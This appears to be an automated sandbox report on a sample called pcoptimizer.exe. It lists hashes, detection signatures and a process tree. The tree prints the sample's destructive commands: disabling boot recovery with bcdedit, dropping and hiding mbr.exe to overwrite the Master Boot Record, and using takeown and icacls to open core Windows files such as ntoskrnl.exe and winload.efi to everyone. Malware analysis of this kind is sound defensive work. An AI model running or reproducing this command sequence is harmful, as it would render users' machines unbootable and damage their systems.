Analysis
max time kernel: 0s
platform: windows11-21h2_x64
resource: win11-20240508-en
resource tags: arch:x64, arch:x86, image:win11-20240508-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 01-07-2024 02:23
Static task: static1
Behavioral task: behavioral1
Sample: pcoptimizer.exe
Resource: win11-20240508-en
Errors
General
Target: pcoptimizer.exe
Size: 212KB
MD5: eeaef69144b4ff2e3fb398bb0c880dbe
SHA1: 69c4958b752e615f829cb50846a651b996ec9b9d
SHA256: b308979b80ff6586c755a2e72fb988819ae4b50fb021ab0d1f27b0c6899d2bc1
SHA512: 5a5ec302a4f379244e757967c759a988844e35be2edfe19c705641ca3bbaa48d1b948c58046d51fe95a927cbc89539bef583549807bd04a6a4381ebf3d1fb0f9
SSDEEP: 6144:at5hBPi0BW69hd1MMdxPe9N9uA069TBZlU25hFDaXb0:atzww69T7q25zDP
Malware Config
Signatures
- Modifies boot configuration data using bcdedit (1 TTPs, 1 IoCs)
- Possible privilege escalation attempt (14 IoCs)
  Processes (pid, process):
    1828 takeown.exe
    4236 takeown.exe
    3132 takeown.exe
    3260 icacls.exe
    4856 icacls.exe
    4544 takeown.exe
    4708 takeown.exe
    5116 icacls.exe
    400 icacls.exe
    4264 takeown.exe
    2188 takeown.exe
    1152 icacls.exe
    3768 icacls.exe
    4604 icacls.exe
- Sets file to hidden (1 TTPs, 1 IoCs)
  Modifies file attributes to stop it showing in Explorer etc.
- Executes dropped EXE (1 IoCs)
  Processes (pid, process):
    4088 mbr.exe
- Modifies file permissions (1 TTPs, 14 IoCs)
  Processes (pid, process):
    4856 icacls.exe
    1152 icacls.exe
    4236 takeown.exe
    4264 takeown.exe
    2188 takeown.exe
    3260 icacls.exe
    4544 takeown.exe
    4708 takeown.exe
    400 icacls.exe
    3768 icacls.exe
    4604 icacls.exe
    3132 takeown.exe
    5116 icacls.exe
    1828 takeown.exe
- File and Directory Permissions Modification: Windows File and Directory Permissions Modification (1 TTPs)
- Writes to the Master Boot Record (MBR) (1 TTPs, 1 IoCs)
  Bootkits write to the MBR to gain persistence at a level below the operating system.
  Processes (description, ioc, process):
    File opened for modification | \??\PhysicalDrive0 | mbr.exe
- Drops file in System32 directory (3 IoCs)
  Processes (description, ioc, process):
    File created | C:\Windows\System32\mbr.exe | cmd.exe
    File opened for modification | C:\Windows\System32\mbr.exe | cmd.exe
    File opened for modification | C:\Windows\System32\mbr.exe | attrib.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Kills process with taskkill (1 IoCs)
  Processes (pid, process):
    4204 taskkill.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes (description, pid, process):
    Token: SeTakeOwnershipPrivilege | 4264 | takeown.exe
- Suspicious use of WriteProcessMemory (13 IoCs)
  Processes (description, pid, process, target process):
    PID 3692 wrote to memory of 1404 | 3692 | pcoptimizer.exe | cmd.exe
    PID 3692 wrote to memory of 1404 | 3692 | pcoptimizer.exe | cmd.exe
    PID 1404 wrote to memory of 1508 | 1404 | cmd.exe | bcdedit.exe
    PID 1404 wrote to memory of 1508 | 1404 | cmd.exe | bcdedit.exe
    PID 1404 wrote to memory of 4784 | 1404 | cmd.exe | attrib.exe
    PID 1404 wrote to memory of 4784 | 1404 | cmd.exe | attrib.exe
    PID 1404 wrote to memory of 4088 | 1404 | cmd.exe | mbr.exe
    PID 1404 wrote to memory of 4088 | 1404 | cmd.exe | mbr.exe
    PID 1404 wrote to memory of 4088 | 1404 | cmd.exe | mbr.exe
    PID 1404 wrote to memory of 4264 | 1404 | cmd.exe | takeown.exe
    PID 1404 wrote to memory of 4264 | 1404 | cmd.exe | takeown.exe
    PID 1404 wrote to memory of 400 | 1404 | cmd.exe | icacls.exe
    PID 1404 wrote to memory of 400 | 1404 | cmd.exe | icacls.exe
- Views/modifies file attributes (1 TTPs, 1 IoCs)
Processes (process tree; the bracketed number is the depth in the tree)
[1] C:\Users\Admin\AppData\Local\Temp\pcoptimizer.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\pcoptimizer.exe"
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\cmd.exe
      command line: "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4016.tmp\4017.tmp\4018.bat C:\Users\Admin\AppData\Local\Temp\pcoptimizer.exe"
      - Drops file in System32 directory
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\bcdedit.exe
        command line: bcdedit /set {default} recoveryenabled no
        - Modifies boot configuration data using bcdedit
    [3] C:\Windows\system32\attrib.exe
        command line: attrib +s +h C:\Windows\System32\mbr.exe
        - Sets file to hidden
        - Drops file in System32 directory
        - Views/modifies file attributes
    [3] C:\Windows\System32\mbr.exe
        command line: C:\Windows\System32\mbr.exe
        - Executes dropped EXE
        - Writes to the Master Boot Record (MBR)
    [3] C:\Windows\system32\takeown.exe
        command line: takeown /f "C:\Windows\System32\ntoskrnl.exe"
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe
        command line: icacls "C:\Windows\System32\ntoskrnl.exe" /grant everyone:F
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\takeown.exe
        command line: takeown /f "C:\Windows\System32\hal.dll"
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        command line: icacls "C:\Windows\System32\hal.dll" /grant everyone:F
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\takeown.exe
        command line: takeown /f "C:\Windows\System32\ci.dll"
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        command line: icacls "C:\Windows\System32\ci.dll" /grant everyone:F
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\takeown.exe
        command line: takeown /f "C:\Windows\System32\winload.efi"
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        command line: icacls "C:\Windows\System32\winload.efi" /grant everyone:F
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\takeown.exe
        command line: takeown /f "C:\Program Files\WindowsApps"
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        command line: icacls "C:\Program Files\WindowsApps" /grant everyone:F
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\takeown.exe
        command line: takeown /f "C:\Windows\SystemApps"
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        command line: icacls "C:\Windows\SystemApps" /grant everyone:F
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\takeown.exe
        command line: takeown /f "C:\Windows\ImmersiveControlPanel"
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        command line: icacls "C:\Windows\ImmersiveControlPanel" /grant everyone:F
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\taskkill.exe
        command line: taskkill /f /im discord.exe
        - Kills process with taskkill
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell wininit
      [4] C:\Windows\system32\wininit.exe
          command line: "C:\Windows\system32\wininit.exe"
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- C:\Users\Admin\AppData\Local\Temp\4016.tmp\4017.tmp\4018.bat
  Filesize: 1KB
  MD5: c076d53a79bdea72d3252f6e7eabec00
  SHA1: bd016c13f09b771218cbb2fed51d0d9c722f439d
  SHA256: de3b425e1d62e1d24b9cef8e46a06b00ad08ee3bd08e9e99499de13f7043eb9f
  SHA512: f8b18940bb8b61a23d9b700913dc6336bff5b309bca30012bf9d62a06d8c7df2c2e0adccf9670c120bb4b707e2cdbe3587fce266a6bb0409b3e5caee9011f6bd
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qhufzkx1.qpq.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- C:\Windows\System32\mbr.exe
  Filesize: 47KB
  MD5: 8562ed46d745dceb3cc268693ca25c83
  SHA1: 309067f0c9703084654495a47e67f7a40824700d
  SHA256: ea5d21e6598d52b30e9d055bc406c6227bbadb5c493addb27b32fb16a6dcae8c
  SHA512: 52f23e70f7ea6eab1a50a4008e563d787732f7361dfe10c48f39dae42bce023c90449c9a903733fab13c49b50f8c4fa7d4864ab26c69326aab0149c765fd677b
- memory/776-15-0x0000018EF2530000-0x0000018EF2552000-memory.dmp
  Filesize: 136KB
- memory/4088-9-0x0000000000400000-0x0000000000412000-memory.dmp
  Filesize: 72KB